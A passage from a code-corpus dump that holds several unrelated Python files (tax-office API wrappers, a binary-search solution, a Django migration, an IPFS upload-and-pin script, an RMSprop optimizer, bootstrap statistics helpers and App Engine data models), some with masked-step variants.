check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom fw.api import dadata_proxy\nfrom flask import current_app\n\nfrom fw.cache.cache_wrapper import CacheWrapper\n\ncache = CacheWrapper()\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number, internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n\n return _get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n\n return _book_ifns(person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None, date_to=None,\n service=None, ifns=None, service_nalog_ru_url=None, logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n\n return _get_ifns_registrations(name, company_type=company_type, date_from=date_from, date_to=date_to,\n service=service, ifns=ifns, service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n\n\n",
"step-ids": [
9,
11,
12,
13,
14
]
}
|
[
9,
11,
12,
13,
14
] |
class Solution:
def searchRange(self, nums: List[int], target: int) ->List[int]:
res = [-1, -1]
def binary_serach(left, right, target, res):
if left >= right:
return
mid = (left + right) // 2
if nums[mid] == target:
if res[0] == -1:
res[0] = res[1] = mid
else:
res[0] = min(res[0], mid)
res[1] = max(res[1], mid)
if nums[mid] > target:
binary_serach(left, mid, target, res)
elif nums[mid] < target:
binary_serach(mid + 1, right, target, res)
else:
binary_serach(left, mid, target, res)
binary_serach(mid + 1, right, target, res)
if nums:
binary_serach(0, len(nums), target, res)
return res
|
normal
|
{
"blob_id": "18b82f83d3bf729eadb2bd5a766f731a2c54a93b",
"index": 1607,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def searchRange(self, nums: List[int], target: int) ->List[int]:\n res = [-1, -1]\n\n def binary_serach(left, right, target, res):\n if left >= right:\n return\n mid = (left + right) // 2\n if nums[mid] == target:\n if res[0] == -1:\n res[0] = res[1] = mid\n else:\n res[0] = min(res[0], mid)\n res[1] = max(res[1], mid)\n if nums[mid] > target:\n binary_serach(left, mid, target, res)\n elif nums[mid] < target:\n binary_serach(mid + 1, right, target, res)\n else:\n binary_serach(left, mid, target, res)\n binary_serach(mid + 1, right, target, res)\n if nums:\n binary_serach(0, len(nums), target, res)\n return res\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-29 03:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('django_otp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='otpsecrets',
name='issuer_name',
field=models.CharField(blank=True, db_index=True, max_length=40),
),
]
|
normal
|
{
"blob_id": "d45ca839a24093266c48e5f97164b160190b154d",
"index": 2133,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('django_otp', '0001_initial')]\n operations = [migrations.AddField(model_name='otpsecrets', name=\n 'issuer_name', field=models.CharField(blank=True, db_index=True,\n max_length=40))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('django_otp', '0001_initial')]\n operations = [migrations.AddField(model_name='otpsecrets', name=\n 'issuer_name', field=models.CharField(blank=True, db_index=True,\n max_length=40))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.4 on 2016-12-29 03:38\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('django_otp', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='otpsecrets',\n name='issuer_name',\n field=models.CharField(blank=True, db_index=True, max_length=40),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import argparse
import subprocess
import os
def get_files(dir_path, ext='.png'):
relative_paths = os.listdir(dir_path)
relative_paths = list(filter(lambda fp: ext in fp, relative_paths))
return list(map(lambda rel_p: os.path.join(dir_path, rel_p), relative_paths))
def ipfs_add_local(file_path):
'Returns CID'
proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True, text=True)
stdout = proc.stdout
try:
return stdout.split()[1]
except IndexError as e:
print(e)
print(stdout)
return ""
def pin_with_pinata(cid, name):
proc = subprocess.run(['ipfs', 'pin', 'remote', 'add', '--service=pinata', f'--name={name}', str(cid)], capture_output=True, text=True)
print(f'Uploaded cid: {cid}')
# print(proc.stdout)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Batch IPFS file uploading')
parser.add_argument('-i', '--input', help='Path to directory containing media to upload', required=True)
args = vars(parser.parse_args())
files_to_upload = get_files(args['input'])
info = {}
for fp in files_to_upload:
print(fp)
cid = ipfs_add_local(fp)
if cid == "":
print(f'{fp} failed to upload!')
continue
name = os.path.basename(fp)
info[name] = {'cid': cid}
pin_with_pinata(cid, name)
with open(f'{args["input"]}/result.csv', 'w') as f:
for fn in sorted(info.keys()):
cid = info[fn]['cid']
f.write(f'{fn}, {cid}\n')
f.close()
|
normal
|
{
"blob_id": "7ca88d451ad702e5a8e532da3e3f5939cfaa7215",
"index": 9571,
"step-1": "<mask token>\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p),\n relative_paths))\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p),\n relative_paths))\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Batch IPFS file uploading')\n parser.add_argument('-i', '--input', help=\n 'Path to directory containing media to upload', required=True)\n args = vars(parser.parse_args())\n files_to_upload = get_files(args['input'])\n info = {}\n for fp in files_to_upload:\n print(fp)\n cid = ipfs_add_local(fp)\n if cid == '':\n print(f'{fp} failed to upload!')\n continue\n name = os.path.basename(fp)\n info[name] = {'cid': cid}\n pin_with_pinata(cid, name)\n with open(f\"{args['input']}/result.csv\", 'w') as f:\n for fn in sorted(info.keys()):\n cid = info[fn]['cid']\n f.write(f'{fn}, {cid}\\n')\n f.close()\n",
"step-4": "import argparse\nimport subprocess\nimport os\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p),\n relative_paths))\n\n\ndef ipfs_add_local(file_path):\n \"\"\"Returns CID\"\"\"\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True,\n text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return ''\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add',\n '--service=pinata', f'--name={name}', str(cid)], capture_output=\n True, text=True)\n print(f'Uploaded cid: {cid}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Batch IPFS file uploading')\n parser.add_argument('-i', '--input', help=\n 'Path to directory containing media to upload', required=True)\n args = vars(parser.parse_args())\n files_to_upload = get_files(args['input'])\n info = {}\n for fp in files_to_upload:\n print(fp)\n cid = ipfs_add_local(fp)\n if cid == '':\n print(f'{fp} failed to upload!')\n continue\n name = os.path.basename(fp)\n info[name] = {'cid': cid}\n pin_with_pinata(cid, name)\n with open(f\"{args['input']}/result.csv\", 'w') as f:\n for fn in sorted(info.keys()):\n cid = info[fn]['cid']\n f.write(f'{fn}, {cid}\\n')\n f.close()\n",
"step-5": "import argparse\nimport subprocess\nimport os\n\n\ndef get_files(dir_path, ext='.png'):\n relative_paths = os.listdir(dir_path)\n relative_paths = list(filter(lambda fp: ext in fp, relative_paths))\n return list(map(lambda rel_p: os.path.join(dir_path, rel_p), relative_paths))\n\n\ndef ipfs_add_local(file_path):\n 'Returns CID'\n proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True, text=True)\n stdout = proc.stdout\n try:\n return stdout.split()[1]\n except IndexError as e:\n print(e)\n print(stdout)\n return \"\"\n\n\ndef pin_with_pinata(cid, name):\n proc = subprocess.run(['ipfs', 'pin', 'remote', 'add', '--service=pinata', f'--name={name}', str(cid)], capture_output=True, text=True)\n print(f'Uploaded cid: {cid}')\n # print(proc.stdout)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Batch IPFS file uploading')\n parser.add_argument('-i', '--input', help='Path to directory containing media to upload', required=True)\n args = vars(parser.parse_args())\n\n files_to_upload = get_files(args['input'])\n\n info = {}\n\n for fp in files_to_upload:\n print(fp)\n cid = ipfs_add_local(fp)\n if cid == \"\":\n print(f'{fp} failed to upload!')\n continue\n name = os.path.basename(fp)\n info[name] = {'cid': cid}\n\n pin_with_pinata(cid, name)\n\n with open(f'{args[\"input\"]}/result.csv', 'w') as f:\n for fn in sorted(info.keys()):\n cid = info[fn]['cid']\n f.write(f'{fn}, {cid}\\n')\n\n f.close()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
<|reserved_special_token_0|>
def set_train_data(self, x: np.array, t: np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self, w, **kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1, self.n_iter):
[gradE, E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return w
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
def set_param(self, param):
if 'learning_rate' in param.keys():
self.learning_rate = param['learning_rate']
else:
self.learning_rate = 0.01
if 'n_iter' in param.keys():
self.n_iter = param['n_iter']
else:
self.n_iter = int(1000)
if 'rho' in param.keys():
self.rho = param['rho']
else:
self.rho = 0.9
if 'epsilon' in param.keys():
self.epsilon = param['epsilon']
else:
self.epsilon = 1e-08
def set_train_data(self, x: np.array, t: np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self, w, **kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1, self.n_iter):
[gradE, E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return w
<|reserved_special_token_1|>
import numpy as np
from nn.feedforward_nn import Feed_Forward
class RMSprop(object):
def __init__(self, n_in, n_hid, n_out, regularization_coe):
self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)
def set_param(self, param):
if 'learning_rate' in param.keys():
self.learning_rate = param['learning_rate']
else:
self.learning_rate = 0.01
if 'n_iter' in param.keys():
self.n_iter = param['n_iter']
else:
self.n_iter = int(1000)
if 'rho' in param.keys():
self.rho = param['rho']
else:
self.rho = 0.9
if 'epsilon' in param.keys():
self.epsilon = param['epsilon']
else:
self.epsilon = 1e-08
def set_train_data(self, x: np.array, t: np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self, w, **kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1, self.n_iter):
[gradE, E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return w
<|reserved_special_token_1|>
import numpy as np
from nn.feedforward_nn import Feed_Forward
class RMSprop(object):
def __init__(self,n_in,n_hid,n_out,regularization_coe):
self.nn = Feed_Forward(n_in,n_hid,n_out,regularization_coe)
def set_param(self,param):
if 'learning_rate' in param.keys():
self.learning_rate = param['learning_rate']
else:
self.learning_rate = 0.01
if 'n_iter' in param.keys():
self.n_iter = param['n_iter']
else:
self.n_iter = int(1000)
if 'rho' in param.keys():
self.rho = param['rho']
else:
self.rho = 0.9
if 'epsilon' in param.keys():
self.epsilon = param['epsilon']
else:
self.epsilon = 1e-8
def set_train_data(self,x:np.array,t:np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self,w,**kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1,self.n_iter):
[gradE,E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return(w)
|
flexible
|
{
"blob_id": "f971302f39149bcdcbe4237cc71219572db600d4",
"index": 8720,
"step-1": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-3": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-4": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-5": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\nclass RMSprop(object):\n\n def __init__(self,n_in,n_hid,n_out,regularization_coe):\n self.nn = Feed_Forward(n_in,n_hid,n_out,regularization_coe)\n\n\n def set_param(self,param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-8\n\n def set_train_data(self,x:np.array,t:np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self,w,**kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1,self.n_iter):\n [gradE,E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return(w)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
"""
Yield samples that match the sizes given in test_set_sizes
"""
for sample_idx, sample_size in zip(range(num_samples), cycle(
test_set_sizes)):
yield random.sample(test_universe, sample_size)
<|reserved_special_token_0|>
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
"""
Yield samples that match the sizes given in test_set_sizes
"""
for sample_idx, sample_size in zip(range(num_samples), cycle(
test_set_sizes)):
yield random.sample(test_universe, sample_size)
def calculate_bootstrap_statistics(samples, statistic):
"""Calculate the bootstrap statistics for the samples."""
stats = list(map(statistic, samples))
stats.sort()
return stats
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from itertools import cycle
import random
import bisect
def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
"""
Yield samples that match the sizes given in test_set_sizes
"""
for sample_idx, sample_size in zip(range(num_samples), cycle(
test_set_sizes)):
yield random.sample(test_universe, sample_size)
def calculate_bootstrap_statistics(samples, statistic):
"""Calculate the bootstrap statistics for the samples."""
stats = list(map(statistic, samples))
stats.sort()
return stats
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
#
# Copyright John Reid 2009
#
"""
Code to handle bootstrap analyses.
"""
from itertools import cycle
import random
import bisect
def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
"""
Yield samples that match the sizes given in test_set_sizes
"""
for sample_idx, sample_size in zip(range(num_samples), cycle(test_set_sizes)):
yield random.sample(test_universe, sample_size)
def calculate_bootstrap_statistics(samples, statistic):
"Calculate the bootstrap statistics for the samples."
stats = list(map(statistic, samples))
stats.sort()
return stats
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1. - bisect.bisect_left(bootstrap_stats, stat_value) / float(len(bootstrap_stats))
|
flexible
|
{
"blob_id": "752affdfa1481b9a19a9b7dfe76f9d5d11c80073",
"index": 4678,
"step-1": "<mask token>\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-2": "<mask token>\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(\n test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\n<mask token>\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-3": "<mask token>\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(\n test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\ndef calculate_bootstrap_statistics(samples, statistic):\n \"\"\"Calculate the bootstrap statistics for the samples.\"\"\"\n stats = list(map(statistic, samples))\n stats.sort()\n return stats\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-4": "<mask token>\nfrom itertools import cycle\nimport random\nimport bisect\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(\n test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\ndef calculate_bootstrap_statistics(samples, statistic):\n \"\"\"Calculate the bootstrap statistics for the samples.\"\"\"\n stats = list(map(statistic, samples))\n stats.sort()\n return stats\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-5": "#\n# Copyright John Reid 2009\n#\n\n\n\"\"\"\nCode to handle bootstrap analyses.\n\"\"\"\n\nfrom itertools import cycle\nimport random\nimport bisect\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\ndef calculate_bootstrap_statistics(samples, statistic):\n \"Calculate the bootstrap statistics for the samples.\"\n stats = list(map(statistic, samples))\n stats.sort()\n return stats\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1. - bisect.bisect_left(bootstrap_stats, stat_value) / float(len(bootstrap_stats))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
__author__ = 'Chitrang'
from google.appengine.api import memcache
from google.appengine.ext import db
import logging
import os
import jinja2
class User(db.Model):
id = db.StringProperty(required=True)
created = db.DateTimeProperty(auto_now_add=True)
updated = db.DateTimeProperty(auto_now=True)
name = db.StringProperty(required=True)
profile_url = db.StringProperty(required=True)
access_token = db.StringProperty(required=True)
email = db.StringProperty(required=False)
penn_id = db.StringProperty(required=False)
email_verified = db.BooleanProperty(required=True)
verification_code = db.StringProperty(required=True)
#posts
chair = db.StringProperty(required=False)
vicechair = db.StringProperty(required=False)
treasurer = db.StringProperty(required=False)
socialchair = db.StringProperty(required=False)
operationschair = db.StringProperty(required=False)
gapsaliason = db.StringProperty(required=False)
communicationschair = db.StringProperty(required=False)
webadmin = db.StringProperty(required=False)
marketingchair = db.StringProperty(required=False)
#counts
chair_count = db.IntegerProperty(required=False, default=0)
vicechair_count = db.IntegerProperty(required=False, default=0)
treasurer_count = db.IntegerProperty(required=False, default=0)
socialchair_count = db.IntegerProperty(required=False, default=0)
operationschair_count = db.IntegerProperty(required=False, default=0)
gapsaliason_count = db.IntegerProperty(required=False, default=0)
communicationschair_count = db.IntegerProperty(required=False, default=0)
webadmin_count = db.IntegerProperty(required=False, default=0)
marketingchair_count = db.IntegerProperty(required=False, default=0)
@classmethod
def all_data(cls):
all_data = db.GqlQuery("SELECT *"
"FROM User")
return list(all_data)
#logging.info("updating cache")
#memcache.set('users', list(all_data))
@classmethod
def set_email(cls, id, email):
user = User.get_by_key_name(id)
penn_id = email.split("@")[0]
user.email = email
user.penn_id = penn_id
user.put()
#User.update_cache()
@classmethod
def is_email_verified(cls, email):
data = User.all_data()
if data is not None:
all_emails = {user.email : user.email_verified for user in data}
logging.info("all email information "+ str(all_emails))
return all_emails.get(email, False)
@classmethod
def is_pennid_verified(cls, email):
penn_id = email.split("@")[0]
all_data = User.all_data()
if all_data is not None:
all_penn_ids = {user.penn_id: user.email_verified for user in all_data}
logging.info("all penn id information" + str(all_penn_ids))
return all_penn_ids.get(penn_id, False)
class Answer(db.Model):
answer = db.TextProperty(required=True)
answered_by = db.StringProperty(required=True)
answerer_name = db.StringProperty(required=True)
upvoted_by = db.ListProperty(str)
def get_votes(self):
return len(self.upvoted_by)
def get_upvote_link(self):
return "/q/question/upvote/%s"%self.key().id()
def render_str(template, **params):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
jinja_environment = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),
autoescape = True)
t = jinja_environment.get_template(template)
return t.render(params)
class Question(db.Model):
question = db.TextProperty(required = True)
created = db.DateTimeProperty(auto_now_add = True)
last_modified = db.DateTimeProperty(auto_now = True)
answers = db.ListProperty(item_type=db.Key,required=True)
asked_by = db.StringProperty(required=True)
asker_name = db.StringProperty(required=True)
def render(self):
self._render_text = self.question.replace('\n', '<br>')
return render_str("question.html", q = self)
def as_dict(self):
time_fmt = '%c'
d = {'question': self.question,
'created': self.created.strftime(time_fmt),
